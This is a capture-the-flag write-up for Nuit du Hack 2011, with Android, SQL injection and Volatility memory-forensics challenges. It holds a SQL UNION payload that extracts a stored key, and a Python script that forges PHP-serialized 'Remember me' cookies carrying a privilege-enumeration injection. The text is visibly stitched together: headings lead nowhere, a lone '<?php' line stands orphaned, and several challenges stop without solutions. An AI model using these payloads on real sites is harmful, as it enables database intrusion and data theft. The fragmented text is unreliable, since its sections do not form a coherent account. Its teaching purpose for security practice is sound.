NDH2k11 nuit du hack 2011
This challenge was surprisingly simple. We were given an Android .apk file. After converting the apk to a jar using dex2jar, we opened the jar in the Java decompiler JD and immediately came across the following chunk of code, which takes the first speech-recognition result, checks it with a.b() and, if it passes, transforms it with a.a() and displays it:

    ArrayList localArrayList = paramIntent.getStringArrayListExtra("android.speech.extra.RESULTS");  // phrases returned by the speech recognizer
    if ((!localArrayList.isEmpty()) && (a.b((String)localArrayList.get(0)))) {   // a.b(): validates the first phrase
        TextView localTextView = this.b;
        String str = a.a((String)localArrayList.get(0));                          // a.a(): derives the text to display from it
        localTextView.setText(str);
    }
"Python source code is very clear and concise, and could sometimes bring out lots of clues. This is particularly true for this challenge."
This challenge proved to be rather interesting because it validated our incessant desire to run a brute force while we look for other solutions.
The Python code is very clean, but after a while the layering of inheritance across the classes and the sheer amount of code become rather dizzying. After reading through all of it, the part that matters can be distilled down to the following sections:
1. (server side) network.py
We were presented with a website resembling a French DMV site on which we could upload images of license plates. After accepting an upload, the site would OCR the image and look up any existing infractions for the recognised plate.
We got extremely lucky: while one of us was guessing filenames in the /upload directory, he stumbled upon regplate.jpg at a moment when it contained a picture of a plate whose text was a SQL injection payload, which meant the OCR output was going straight into the lookup query. We re-uploaded that image and got the key.
Key: php/mysql=>el33T
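What the plate lookup must have looked like for a picture of SQL to return the key, as an added example in Python with sqlite3 standing in for PHP/MySQL (this is not the challenge's own code; the table names, the plate-format check and the sample rows are assumptions). The vulnerable path pastes the OCR text into the query; the hardened path binds it as a parameter and rejects anything that is not plate-shaped before it reaches the database.

```python
import re
import sqlite3

# Constructed sample data standing in for the site's infraction database; the
# real schema is not shown in the writeup, so every name below is an assumption.
PLATES = [("AB-123-CD", "speeding, 2010-11-03"),
          ("ZZ-999-ZZ", "parking, 2011-01-15")]
FLAG = "php/mysql=>el33T"   # the key reported on the page, placed where a UNION can reach it

PLATE_RE = re.compile(r"^[A-Z]{2}-\d{3}-[A-Z]{2}$")   # SIV-format French plate (assumed check)


def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE infractions (plate TEXT, infraction TEXT)")
    db.executemany("INSERT INTO infractions VALUES (?, ?)", PLATES)
    db.execute("CREATE TABLE secrets (name TEXT, value TEXT)")
    db.execute("INSERT INTO secrets VALUES ('key', ?)", (FLAG,))
    return db


def lookup_vulnerable(db, ocr_text):
    # The bug: whatever the OCR engine read off the plate image is pasted straight
    # into the SQL string, so a plate that "reads" as SQL is executed as SQL.
    query = "SELECT infraction FROM infractions WHERE plate = '%s'" % ocr_text
    return [row[0] for row in db.execute(query)]


def lookup_safe(db, ocr_text):
    # Hardened form: the OCR result is bound as a parameter, never parsed as SQL,
    # and anything that is not plate-shaped is rejected before it reaches the query.
    if not PLATE_RE.match(ocr_text):
        return []
    rows = db.execute("SELECT infraction FROM infractions WHERE plate = ?", (ocr_text,))
    return [row[0] for row in rows]


# Text that a plate image would have to OCR to in order to pull the key out via UNION.
PLATE_PAYLOAD = "' UNION SELECT value FROM secrets-- "

if __name__ == "__main__":
    conn = build_db()
    print("vulnerable:", lookup_vulnerable(conn, PLATE_PAYLOAD))   # leaks the key
    print("safe:      ", lookup_safe(conn, PLATE_PAYLOAD))         # rejected
```

The format check is defence in depth, not the fix: parameter binding alone already stops the injection, but refusing non-plate input also keeps junk OCR output out of the logs and the query planner.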
We were presented with a login page along with a registration page. Poking at the inputs for these pages, we weren't able to find a vulnerability. However, one of us noticed that when "Remember me" was selected, the server set a cookie user_cookies with the value containing base64'ed serialized PHP. We found that this serialized value contained an array with two elements, one for the username and the other for the password. We found that we could inject SQL into the username element of the array, so we crafted a SQL statement to see what privileges were available.
<?php
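How the user_cookies value can be forged and decoded, as an added example in Python rather than the writeup's own PHP. It implements the subset of PHP's serialize() format the cookie uses (a two-element array of strings, username then password, as the writeup describes), base64-encodes it, and shows the query shape the server would end up executing. The users table, the column layout and the exact privilege-enumeration payload are assumptions; the page only says the username element was injectable.

```python
import base64


def php_serialize_array(items):
    # Minimal PHP serialize() for a plain list of strings:
    #   a:<count>:{i:0;s:<bytes>:"<value>";i:1;s:<bytes>:"<value>";}
    body = ""
    for i, value in enumerate(items):
        body += 'i:%d;s:%d:"%s";' % (i, len(value.encode("utf-8")), value)
    return "a:%d:{%s}" % (len(items), body)


def php_unserialize_string_array(data):
    # Inverse of the above for the same subset. Because strings are length-prefixed,
    # quotes, semicolons and dashes inside the username are carried verbatim, which
    # is exactly why an injection survives the round trip through the cookie.
    if not data.startswith(b"a:"):
        raise ValueError("not a serialized array")
    count_end = data.index(b":", 2)
    count = int(data[2:count_end])
    pos = count_end + 2                      # skip ':{'
    items = []
    for _ in range(count):
        pos = data.index(b";", pos) + 1      # skip 'i:<n>;'
        if data[pos:pos + 2] != b"s:":
            raise ValueError("expected a string element")
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                    # skip ':"'
        items.append(data[start:start + length].decode("utf-8"))
        pos = start + length + 2             # skip '";'
    if data[pos:pos + 1] != b"}":
        raise ValueError("trailing garbage after array")
    return items


def forge_cookie(username, password):
    # Builds a user_cookies value with the layout the writeup describes
    # (username in slot 0, password in slot 1), base64'ed like the server's.
    serialized = php_serialize_array([username, password]).encode("utf-8")
    return base64.b64encode(serialized).decode("ascii")


def read_cookie(cookie):
    return php_unserialize_string_array(base64.b64decode(cookie))


def query_from_cookie(cookie):
    # Assumed shape of the server's lookup (the writeup does not show the PHP);
    # this is what the database receives once the cookie is unserialized.
    username, password = read_cookie(cookie)
    return "SELECT * FROM users WHERE username='%s' AND password='%s'" % (username, password)


# MySQL payload to list the privileges of the application's database account.
# The UNION column count (3) is an assumption about the users table.
PRIV_PAYLOAD = "' UNION SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges-- "

if __name__ == "__main__":
    cookie = forge_cookie(PRIV_PAYLOAD, "x")
    print("Cookie: user_cookies=" + cookie)
    print(query_from_cookie(cookie))
```

The trailing space after `--` matters for MySQL, which only treats `--` as a comment when it is followed by whitespace; the length prefix in the serialized string is what lets that space survive intact.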
"We have dumped the RAM of a machine on which a VNC server was running. The goal is to get the password of that VNC server."

Using Volatility 1.3 with the registry plugins by Moyix (http://moyix.blogspot.com/2009/01/memory-registry-tools.html), it is simple enough to scan for registry hives and dump them to CSV files:

[solo@macintosh:~/Desktop/tools/volatility]$ python2.6 volatility hivescan -f ~/Desktop/forensic100/Desktop/dump.raw
Offset          (hex)
44759904        0x2aafb60
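A simplified version of the hive-finding step, as an added example in Python that is not part of the writeup or of Volatility. It walks a raw image at page granularity for the `regf` base block and validates each hit the way an analyst would before trusting it: version fields, the XOR-32 header checksum, and whether the two sequence numbers agree (a mismatch means the hive was mid-write when memory was captured). Note that Volatility's hivescan locates hives through the kernel's _CMHIVE pool allocations rather than the on-disk magic, so the two methods need not agree on every hive (a paged-out header is invisible to this scan). The sample image is constructed in the block.

```python
import struct

REGF_MAGIC = b"regf"
PAGE = 0x1000
BASE_BLOCK = 0x200          # the hive base block is 512 bytes; checksum lives at 0x1FC


def base_block_checksum(block):
    # XOR of the 127 DWORDs preceding the checksum field, with the two reserved
    # results remapped as Windows does (0xFFFFFFFF -> 0xFFFFFFFE, 0 -> 1).
    x = 0
    for i in range(0, 0x1FC, 4):
        x ^= struct.unpack_from("<I", block, i)[0]
    if x == 0xFFFFFFFF:
        return 0xFFFFFFFE
    if x == 0:
        return 1
    return x


def parse_base_block(block):
    seq1, seq2 = struct.unpack_from("<II", block, 0x4)
    major, minor = struct.unpack_from("<II", block, 0x14)
    root_cell = struct.unpack_from("<I", block, 0x24)[0]
    stored = struct.unpack_from("<I", block, 0x1FC)[0]
    name = block[0x30:0x70].decode("utf-16-le", "replace").rstrip("\x00")
    return {
        "name": name,
        "version": "%d.%d" % (major, minor),
        "root_cell": root_cell,
        "dirty": seq1 != seq2,                     # sequence mismatch: hive was mid-write
        "checksum_ok": stored == base_block_checksum(block),
    }


def scan_hive_headers(image, step=PAGE):
    # Walk the image at page granularity and report every block carrying the
    # 'regf' magic, with the fields worth checking before trusting the hit.
    hits = []
    for off in range(0, len(image) - BASE_BLOCK + 1, step):
        if image[off:off + 4] == REGF_MAGIC:
            info = parse_base_block(image[off:off + BASE_BLOCK])
            info["offset"] = off
            hits.append(info)
    return hits


def make_base_block(name, corrupt=False):
    # Constructed test data: a minimal but well-formed base block (not from any real dump).
    block = bytearray(BASE_BLOCK)
    block[0:4] = REGF_MAGIC
    struct.pack_into("<II", block, 0x4, 7, 7)          # primary/secondary sequence numbers
    struct.pack_into("<II", block, 0x14, 1, 3)         # format version 1.3
    struct.pack_into("<II", block, 0x1C, 0, 1)         # file type 0 (primary), format 1
    struct.pack_into("<I", block, 0x24, 0x20)          # root cell offset (relative to hbin data)
    struct.pack_into("<II", block, 0x28, 0x1000, 1)    # hbin data size, clustering factor
    block[0x30:0x30 + 2 * len(name)] = name.encode("utf-16-le")
    csum = base_block_checksum(block)
    struct.pack_into("<I", block, 0x1FC, 0 if corrupt else csum)   # 0 never matches a valid checksum
    return bytes(block)


def build_sample_image():
    # Four pages: zeros, a valid SYSTEM hive header, zeros, a header with a bad checksum.
    pad = bytes(PAGE)
    good = make_base_block("SYSTEM") + bytes(PAGE - BASE_BLOCK)
    bad = make_base_block("SAM", corrupt=True) + bytes(PAGE - BASE_BLOCK)
    return pad + good + pad + bad


if __name__ == "__main__":
    for hit in scan_hive_headers(build_sample_image()):
        print("Offset 0x%x  %-8s v%s  checksum_ok=%s  dirty=%s"
              % (hit["offset"], hit["name"], hit["version"], hit["checksum_ok"], hit["dirty"]))
```

On a real dump, pass `step=1` (or a smaller power of two) if hive headers may not sit on page boundaries, at the cost of scan time; the checksum check is what separates genuine base blocks from stray copies of the magic in slack space.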
"We have dumped the ntds.dit file of a machine running Active Directory. You must get the password associated with john's account."
We were given a physical memory dump file DumpRAM_CTF.vmem and used Volatility to analyze this image.
After running a netscan on the image, we observed the following:
jiva@h4ckb0x:~/ctf/nuitduhack2011/fore300$ vol.py netscan --profile=Win7SP1x86 -f DumpRAM_CTF.vmem
Volatile Systems Volatility Framework 1.4_rc1
Offset      Proto   Local Address   Foreign Address   State   Pid   Owner   Created
WARNING : volatility.obj : Unable to find a type for pointer64, assuming int